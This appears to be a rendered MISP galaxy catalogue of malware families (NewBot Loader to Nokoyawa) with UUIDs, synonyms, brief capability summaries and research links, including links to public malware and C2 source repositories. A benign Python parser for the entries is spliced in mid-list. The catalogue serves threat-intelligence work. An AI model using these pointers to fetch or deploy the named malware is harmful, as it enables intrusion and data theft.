Internal MISP references
UUID 10557b51-6a57-499b-a988-e4aeccf51d4e
which can be used as unique global reference for NewBot Loader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NewBounce
Internal MISP references
UUID 1695fd64-5e6a-456f-97a4-d09937920543
which can be used as unique global reference for NewBounce
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NewCore RAT
Internal MISP references
UUID f18b17a7-9124-42e8-a2f2-4a1a9839aee8
which can be used as unique global reference for NewCore RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat - webarchive
- https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html - webarchive
- https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view - webarchive
- https://medium.com/@Sebdraven/goblin-panda-continues-to-target-vietnam-bc2f0f56dcd6 - webarchive
- https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations - webarchive
- https://securelist.com/cycldek-bridging-the-air-gap/97157/ - webarchive
- https://meltx0r.github.io/tech/2020/02/12/goblin-panda-apt.html - webarchive
- https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NewPass
Internal MISP references
UUID c1dbbd04-050c-47ce-8164-791f17a4a6b4
which can be used as unique global reference for NewPass
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NewPosThings
Internal MISP references
UUID 48f95941-8369-4f80-b2b4-abbacd4bc411
which can be used as unique global reference for NewPosThings
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/ - webarchive
- https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NewsReels
Internal MISP references
UUID 1d32e7c3-840e-4247-b28b-818cb1c4ae7c
which can be used as unique global reference for NewsReels
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NewCT
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NewCT.
Known Synonyms |
---|
CT |
Internal MISP references
UUID ec50a75e-81f0-48b3-b1df-215eac646421
which can be used as unique global reference for NewCT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct - webarchive
- http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-express - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf - webarchive
- https://unit42.paloaltonetworks.com/atoms/shallowtaurus/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nexster Bot
Internal MISP references
UUID de3aae04-130b-4c5f-b67c-03f872e76697
which can be used as unique global reference for Nexster Bot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NexusLogger
Internal MISP references
UUID dd1408ac-e288-4389-87f3-7650706f1d51
which can be used as unique global reference for NexusLogger
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ngioweb (Windows)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ngioweb (Windows).
Known Synonyms |
---|
Grobios |
Internal MISP references
UUID 35fd764f-8723-4663-9bbf-5b02a64ec02e
which can be used as unique global reference for Ngioweb (Windows)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NGLite
According to Unit42, NGLite is a backdoor Trojan whose only capability is running commands received through its C2 channel. While that capability is standard for a backdoor, NGLite uses a novel C2 channel: a decentralized peer-to-peer network built on the legitimate NKN (New Kind of Network) service carries traffic between the backdoor and the actors.
Internal MISP references
UUID 3bd8a411-5a99-4cf9-bde9-b7c55e79acf8
which can be used as unique global reference for NGLite
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nibiru
Internal MISP references
UUID 5a998606-a9a9-42ad-affb-9be37e11ec25
which can be used as unique global reference for Nibiru
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NightClub
Internal MISP references
UUID 7b9747fa-291a-497b-ae0a-b0760b2b62e5
which can be used as unique global reference for NightClub
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.nightclub - webarchive
- https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/ - webarchive
- https://i.blackhat.com/BH-US-23/Presentations/US-23-MatthieuFaou-MoustachedBouncer.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nightdoor
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Nightdoor.
Known Synonyms |
---|
NetMM |
Suzafk |
Internal MISP references
UUID e67d39e6-a5c6-4f30-840d-e4efb2f63359
which can be used as unique global reference for Nightdoor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.nightdoor - webarchive
- https://www.welivesecurity.com/en/eset-research/cloudscout-evasive-panda-scouting-cloud-services/ - webarchive
- https://www.welivesecurity.com/en/eset-research/evasive-panda-leverages-monlam-festival-target-tibetans/ - webarchive
- https://symantec-enterprise-blogs.security.com/threat-intelligence/daggerfly-espionage-updated-toolset - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nighthawk
C2 framework.
Internal MISP references
UUID c8b9aa40-9c55-4283-851c-635673f87182
which can be used as unique global reference for Nighthawk
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.nighthawk - webarchive
- https://web.archive.org/web/20221124020920/https://www.proofpoint.com/us/blog/threat-insight/nighthawk-and-coming-pentest-tool-likely-gain-threat-actor-notice - webarchive
- https://web.archive.org/web/20220505170100/https://suspicious.actor/2022/05/05/mdsec-nighthawk-study.html - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/nighthawk-and-coming-pentest-tool-likely-gain-threat-actor-notice - webarchive
- https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f - webarchive
- https://github.com/struppigel/hedgehog-tools/blob/main/nighthawk_str_decoder.py - webarchive
- https://github.com/kevoreilly/CAPEv2/blob/master/modules/processing/parsers/CAPE/Nighthawk.py - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
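The UUID lines in each entry serve as the cluster's globally unique MISP reference, and the reference lists mix direct URLs with web.archive.org snapshots of the same page (the Proofpoint post in the Nighthawk entry above appears both ways). The following is an added example, not code from MISP, Malpedia or the galaxy authors: it parses entries in this page's rendered layout into records keyed by UUID, validates each UUID, and collapses archive copies and cache-busted variants of one reference into a single canonical URL. The sample text is constructed from two entries on this page; the names `parse_galaxy`, `normalise_url` and `Cluster` are the example's own.

```python
"""Parse rendered MISP-galaxy entries into UUID-keyed records (added example)."""
import re
import uuid
from dataclasses import dataclass, field
from urllib.parse import urlsplit, urlunsplit

# Constructed sample: two entries copied in the page's rendered layout.
SAMPLE = """Nighthawk
C2 framework.
Internal MISP references
UUID c8b9aa40-9c55-4283-851c-635673f87182
which can be used as unique global reference for Nighthawk
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.nighthawk - webarchive
- https://web.archive.org/web/20221124020920/https://www.proofpoint.com/us/blog/threat-insight/nighthawk-and-coming-pentest-tool-likely-gain-threat-actor-notice - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/nighthawk-and-coming-pentest-tool-likely-gain-threat-actor-notice - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NightSky
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NightSky.
Known Synonyms |
---|
Night Sky |
Internal MISP references
UUID 5c8dc23a-86a8-4fee-9fa3-371c9d7b4f1c
which can be used as unique global reference for NightSky
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.nightsky - webarchive
- https://malpedia.caad.fkie.fraunhofer.de/details/win.nightsky?1625657388 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
"""

# Wayback snapshot prefix, including flag suffixes such as "id_".
WAYBACK_RE = re.compile(r"^https?://web\.archive\.org/web/\d+(?:[a-z_]+)?/(?P<orig>https?://.+)$")
SECTIONS = {"Synonyms", "Internal MISP references", "External references", "Associated metadata"}


def normalise_url(url: str) -> str:
    """Unwrap Wayback snapshots and drop query/fragment so that archive copies
    and cache-busted variants of one reference compare equal."""
    m = WAYBACK_RE.match(url)
    if m:
        url = m.group("orig")
    p = urlsplit(url)
    return urlunsplit((p.scheme.lower(), p.netloc.lower(), p.path, "", ""))


@dataclass
class Cluster:
    name: str
    uuid: str = ""
    description: str = ""
    synonyms: list = field(default_factory=list)
    references: list = field(default_factory=list)


def parse_galaxy(text: str) -> dict:
    """Split on the metadata table that closes every entry, then read each
    entry's sections. Returns {uuid: Cluster}; raises on a malformed UUID."""
    clusters = {}
    for chunk in re.split(r"^type \| \[\] \|\s*$", text, flags=re.M):
        lines = [ln.rstrip() for ln in chunk.strip("\n").splitlines() if ln.strip()]
        if not lines:
            continue
        cl, desc, section = Cluster(name=lines[0]), [], "description"
        for ln in lines[1:]:
            if ln in SECTIONS:
                section = ln
                continue
            if section == "description":
                desc.append(ln)
            elif section == "Synonyms":
                # Skip the template sentence and the table header/rule lines.
                if ln.startswith(('"synonyms"', "Known Synonyms", "---")):
                    continue
                cl.synonyms.append(ln.rstrip(" |"))
            elif section == "Internal MISP references" and ln.startswith("UUID "):
                cl.uuid = str(uuid.UUID(ln[5:].strip()))  # ValueError if not RFC 4122 shaped
            elif section == "External references" and ln.startswith("- "):
                ref = ln[2:].removesuffix(" - webarchive").strip()
                norm = normalise_url(ref)
                if norm not in cl.references:
                    cl.references.append(norm)
        cl.description = " ".join(desc)
        if not cl.uuid:
            raise ValueError(f"entry {cl.name!r} has no UUID line")
        clusters[cl.uuid] = cl
    return clusters


if __name__ == "__main__":
    for cid, c in parse_galaxy(SAMPLE).items():
        print(cid, c.name, c.synonyms, len(c.references), "unique refs")
```

Keying on the UUID rather than the display name is what lets the records join against MISP events, where the galaxy cluster is referenced by UUID alone; the name-based split used here assumes the page's fixed entry layout and will need adjusting if that layout changes.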
NightSky
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NightSky.
Known Synonyms |
---|
Night Sky |
Internal MISP references
UUID 5c8dc23a-86a8-4fee-9fa3-371c9d7b4f1c
which can be used as unique global reference for NightSky
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.nightsky - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/ - webarchive
- https://twitter.com/cglyer/status/1480734487000453121 - webarchive
- https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation - webarchive
- https://www.youtube.com/watch?v=Yzt_zOO8pDM - webarchive
- https://www.bleepingcomputer.com/news/security/night-sky-is-the-latest-ransomware-targeting-corporate-networks/ - webarchive
- https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader - webarchive
- https://twitter.com/cglyer/status/1480742363991580674 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NikiHTTP
NikiHTTP is a versatile backdoor with multiple capabilities, such as downloading files, executing them, running commands and taking screenshots.
Internal MISP references
UUID e3fd52bb-7331-401d-9cc4-0de6ec82f647
which can be used as unique global reference for NikiHTTP
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NimbleMamba
NimbleMamba is a new implant used by the TA402/Molerats group as a replacement for LastConn. It uses guardrails to ensure that victims are within the actor's target region. It is written in C# and delivered as an obfuscated .NET executable; one observed obfuscator is SmartAssembly.
Internal MISP references
UUID b52a6512-7b0c-431a-8680-93f12921ba46
which can be used as unique global reference for NimbleMamba
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nimbo-C2 (Windows)
According to the author, Nimbo-C2 is yet another (simple and lightweight) C2 framework. The agent currently supports Windows x64 and Linux. It's written in Nim, with some usage of .NET (by dynamically loading the CLR to the process).
Internal MISP references
UUID bda7efa0-e08d-453e-95d4-9307c5104a69
which can be used as unique global reference for Nimbo-C2 (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.nimbo_c2 - webarchive
- https://medium.com/@knownsec404team/apt-k-47-organization-launches-espionage-attacks-using-a-new-trojan-tool-5e7eccfdce2f - webarchive
- https://github.com/itaymigdal/Nimbo-C2 - webarchive
- https://paper.seebug.org/3117/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NimGrabber
Malware written in Nim that steals data, including Discord tokens, from browsers and exfiltrates the results via a Discord webhook.
Internal MISP references
UUID 5f998c1d-0377-404d-8ece-dd3486758a44
which can be used as unique global reference for NimGrabber
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nimplant
Part of Mythic C2, written in Nim. Considered deprecated, as it is only compatible with Mythic 2.1.
Internal MISP references
UUID b8ecda1e-206e-4ab5-b9d7-e50276ba22ea
which can be used as unique global reference for Nimplant
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nimrev
Backdoor written in Nim.
Internal MISP references
UUID 69981781-962a-409a-93c6-cb5377257de8
which can be used as unique global reference for Nimrev
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NimBlackout
According to its author, NimBlackout is an adaptation of the @Blackout project originally developed in C++ by @ZeroMemoryEx, which terminates AV/EDR processes by loading and abusing the vulnerable gmer driver (Bring Your Own Vulnerable Driver, BYOVD). The main reason for the project was to understand how BYOVD attacks work and then to provide a working PoC developed in Nim.
Internal MISP references
UUID 904152c4-7483-41e7-acbb-884a7b32bce4
which can be used as unique global reference for NimBlackout
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NineRAT
Internal MISP references
UUID 2f9982ac-0029-4f4c-b316-4d127dc5f043
which can be used as unique global reference for NineRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NirCmd
NirCmd is a benign command-line tool by NirSoft that provides a wide range of system functionality. Among its features is the ability to start regedit as SYSTEM, which is sometimes abused for privilege escalation, and other functionality that can be repurposed for malicious ends. It is also frequently flagged by AV engines.
Internal MISP references
UUID 51047f06-d824-4b84-a69c-97808b18f6bf
which can be used as unique global reference for NirCmd
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
nitlove
Internal MISP references
UUID 1bdd56fe-beca-4652-af39-87b5e45ae130
which can be used as unique global reference for nitlove
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nitol
Internal MISP references
UUID e1fb348b-5e2b-4a26-95af-431065498ff5
which can be used as unique global reference for Nitol
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol - webarchive
- https://krebsonsecurity.com/tag/nitol/ - webarchive
- https://asec.ahnlab.com/en/44504/ - webarchive
- https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/ - webarchive
- https://en.wikipedia.org/wiki/Nitol_botnet - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nitro
Ransomware family which requires payment in Discord gift cards ("Discord Nitro").
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Nitro.
Known Synonyms |
---|
Hydra |
Internal MISP references
UUID a81635fc-7bb7-4cd1-b26c-ea8ce6cb2763
which can be used as unique global reference for Nitro
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.nitro - webarchive
- https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf - webarchive
- https://github.com/nightfallgt/nitro-ransomware - webarchive
- https://www.bleepingcomputer.com/news/security/discord-nitro-gift-codes-now-demanded-as-ransomware-payments/ - webarchive
- https://twitter.com/malwrhunterteam/status/1430616882231578624 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nitrogen Loader
Internal MISP references
UUID 5b241bc1-cc05-4ab9-8771-1a6b97136576
which can be used as unique global reference for Nitrogen Loader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.nitrogen - webarchive
- https://news.sophos.com/en-us/2023/07/26/into-the-tank-with-nitrogen/ - webarchive
- https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/ - webarchive
- https://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nitrokod
A Turkish cryptominer campaign.
Internal MISP references
UUID d52552e2-17dc-425a-bfc8-ee6a037c704c
which can be used as unique global reference for Nitrokod
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NixScare Stealer
Internal MISP references
UUID a49d1134-f4d9-4778-bbd4-c70655be9cf6
which can be used as unique global reference for NixScare Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NjRAT
RedPacket Security describes NJRat as "a remote access trojan (RAT) [that] has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."
It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NjRAT.
Known Synonyms |
---|
Bladabindi |
Lime-Worm |
Internal MISP references
UUID ff611c24-289e-4f2d-88d2-cfbf771a4e4b
which can be used as unique global reference for NjRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat - webarchive
- https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols - webarchive
- https://www.4hou.com/posts/VoPM - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://www.menlosecurity.com/blog/isomorph-infection-in-depth-analysis-of-a-new-html-smuggling-campaign/ - webarchive
- https://www.ciphertechsolutions.com/roboski-global-recovery-automation/ - webarchive
- https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/ - webarchive
- https://blog.morphisec.com/syk-crypter-discord - webarchive
- https://lab52.io/blog/apt-c-36-from-njrat-to-apt-c-36/ - webarchive
- https://www.trendmicro.com/en_us/research/20/i/wind-up-windscribe-vpn-bundled-with-backdoor.html - webarchive
- https://infosecwriteups.com/unfolding-nj-rat-07nc-and-064d14b875c7cd8-d14b875c7cd8 - webarchive
- https://securelist.com/apt-trends-report-q2-2019/91897/ - webarchive
- https://breachnova.com/blog.php?id=27 - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt - webarchive
- https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/ - webarchive
- https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt - webarchive
- https://www.ecucert.gob.ec/wp-content/uploads/2022/03/alerta-APTs-2022-03-23.pdf - webarchive
- https://github.com/itsKindred/malware-analysis-writeups/blob/master/bashar-bachir-chain/bashar-bachir-analysis.pdf - webarchive
- https://malwr-analysis.com/2020/06/21/njrat-malware-analysis/ - webarchive
- https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/ - webarchive
- https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/ - webarchive
- https://securityintelligence.com/posts/roboski-global-recovery-automation/ - webarchive
- https://labs.k7computing.com/?p=21904 - webarchive
- https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware - webarchive
- https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA - webarchive
- https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/ - webarchive
- https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html - webarchive
- https://infosecwriteups.com/part1-static-code-analysis-of-the-rat-njrat-2f273408df43 - webarchive
- https://blogs.360.cn/post/APT-C-44.html - webarchive
- https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html - webarchive
- https://ti.360.net/blog/articles/analysis-of-apt-c-27/ - webarchive
- https://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/ - webarchive
- https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf - webarchive
- https://twitter.com/ESETresearch/status/1449132020613922828 - webarchive
- https://intel471.com/blog/privateloader-malware - webarchive
- https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf - webarchive
- https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks - webarchive
- https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/ - webarchive
- https://medium.com/@b.magnezi/malware-analysis-njrat-5633847bd6f1 - webarchive
- http://blogs.360.cn/post/analysis-of-apt-c-37.html - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf - webarchive
- https://blog.sonatype.com/bladabindi-njrat-rat-in-jdb.js-npm-malware - webarchive
- https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html - webarchive
- https://attack.mitre.org/groups/G0096 - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel - webarchive
- https://unit42.paloaltonetworks.com/njrat-pastebin-command-and-control - webarchive
- https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services - webarchive
- http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf - webarchive
- https://forensicitguy.github.io/njrat-installed-from-msi/ - webarchive
- https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/ - webarchive
- https://cyberandramen.net/2022/01/12/analysis-of-njrat-powerpoint-macros/ - webarchive
- https://asec.ahnlab.com/1369 - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf - webarchive
- https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/ - webarchive
- https://news.sophos.com/en-us/2020/05/14/raticate/ - webarchive
- https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388 - webarchive
- https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html - webarchive
- https://embeeresearch.io/practical-queries-for-malware-infrastructure-part-3/ - webarchive
- https://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/ - webarchive
- https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.njRAT - webarchive
- https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf - webarchive
- https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g - webarchive
- https://www.secureworks.com/research/threat-profiles/copper-fieldstone - webarchive
- https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains - webarchive
- https://www.seqrite.com/documents/en/white-papers/Whitepaper-OperationSideCopy.pdf - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jan-Jun%202024%20Botnet%20Threat%20Update.pdf - webarchive
- https://cybergeeks.tech/just-another-analysis-of-the-njrat-malware-a-step-by-step-approach/ - webarchive
- https://blog.reversinglabs.com/blog/rats-in-the-library - webarchive
- https://blog.talosintelligence.com/2021/07/sidecopy.html - webarchive
- https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479 - webarchive
- https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.trendmicro.com/en_us/research/23/a/earth-bogle-campaigns-target-middle-east-with-geopolitical-lures.html - webarchive
- https://di.sclosu.re/en/njrat-malware-spreading-through-discord-cdn-and-facebook-ads/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Q4%202023%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/ - webarchive
- https://embee-research.ghost.io/practical-queries-for-malware-infrastructure-part-3/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
nmass malware
A .NET RAT with a hardcoded key.
Internal MISP references
UUID c0a8dc47-13fa-45d7-b55a-e69d798b3244
which can be used as unique global reference for nmass malware
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nocturnal Stealer
Internal MISP references
UUID 94793dbc-3649-40a4-9ccc-1b32846ecb3a
which can be used as unique global reference for Nocturnal Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NodeStealer
Internal MISP references
UUID e7890226-7e39-4902-bbce-e384e0847303
which can be used as unique global reference for NodeStealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nokki
Nokki is a RAT believed to have evolved from Konni RAT. This malware has been tied to attacks using politically motivated lures targeting Russian- and Cambodian-speaking individuals or organizations. Researchers discovered a tie to the threat actor group known as Reaper (also known as APT37).
Internal MISP references
UUID f3cbe9ca-e65e-41af-8eb2-1e9877434124
which can be used as unique global reference for Nokki
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki - webarchive
- https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/ - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nokoyawa Ransomware
Internal MISP references
UUID 934a633a-21f7-4010-a83a-0b64c365355d
which can be used as unique global reference for Nokoyawa Ransomware
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.nokoyawa - webarchive
- https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/ - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v - webarchive
- https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/ - webarchive
- https://www.zscaler.com/blogs/security-research/nokoyawa-ransomware-rust-or-bust - webarchive
- https://www.zscaler.com/blogs/security-research/nevada-ransomware-yet-another-nokayawa-variant - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf - webarchive
